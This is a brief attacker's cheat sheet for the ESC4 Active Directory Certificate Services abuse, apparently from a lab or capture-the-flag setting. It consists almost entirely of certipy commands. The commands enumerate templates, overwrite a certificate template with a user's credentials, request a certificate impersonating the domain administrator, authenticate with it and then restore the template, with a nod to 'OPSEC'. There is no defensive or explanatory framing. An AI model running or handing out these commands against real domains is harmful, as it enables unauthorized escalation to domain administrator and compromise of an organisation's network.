ESC4

Enumerate:

certipy find -u user -p password -dc-ip 192.168.20.100 

Exploit:

# Update Certificate and save the old template for good OPSEC
certipy template -u rachel.philips -p 'Password123!' -dc-ip 192.168.20.100 -template SignatureValidation -save-old

# Request new cert for specific SPN
certipy req -u rachel.philips -p 'Password123!' -dc-ip 192.168.20.100 -target dc.certificate.hack -ca certificate-CA -template SignatureValidation -upn administrator@certificate.hack

# Authenticate 
certipy auth -pfx Administrator.pfx

Clean Up:

certipy template -u rachel.philips -p 'Password123!' -template SignatureValidation -dc-ip 192.168.20.100 --configuration 'SignatureValidation.json'